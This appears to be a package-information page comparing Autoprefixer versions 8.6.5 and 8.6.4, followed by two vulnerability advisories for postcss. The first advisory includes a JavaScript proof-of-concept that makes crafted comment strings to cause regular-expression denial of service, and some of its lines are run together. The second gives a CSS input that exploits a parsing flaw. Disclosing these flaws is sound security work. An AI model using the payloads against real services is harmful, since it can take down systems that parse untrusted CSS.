Autoprefixer is a powerful PostCSS plugin that automatically adds vendor prefixes to your CSS, ensuring compatibility across different web browsers without the need for manual prefixing. Comparing versions 8.6.5 and 8.6.4, the core functionality remains consistent, revolving around parsing CSS and applying prefixes based on data from "Can I Use," meaning developers can expect the same reliable prefixing behavior in both versions. The fundamental dependencies like postcss, browserslist, num2fraction, normalize-range, and postcss-value-parser are unchanged, indicating a stable core architecture.
The most notable difference lies in the caniuse-lite dependency, which is updated from version 1.0.30000859 in 8.6.4 to 1.0.30000864 in 8.6.5. This is crucial - caniuse-lite provides the data Autoprefixer uses to determine which prefixes are needed. Therefore, the update signifies improved prefixing accuracy due to more recent browser support data. Developers should upgrade to 8.6.5 to benefit from the latest browser compatibility information, minimizing unnecessary prefixes and ensuring optimal CSS output and compatibility with newer browser versions thus ensuring website visitors have a consistent and functional experience. Also, the unpacked size decreased slightly, possibly due to a minor optimization. Finally, the release dates indicate that version 8.6.5 arrived less than two weeks after 8.6.4, suggesting a bug fix or minor improvement prompted the quick update.
All the vulnerabilities related to the version 8.6.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.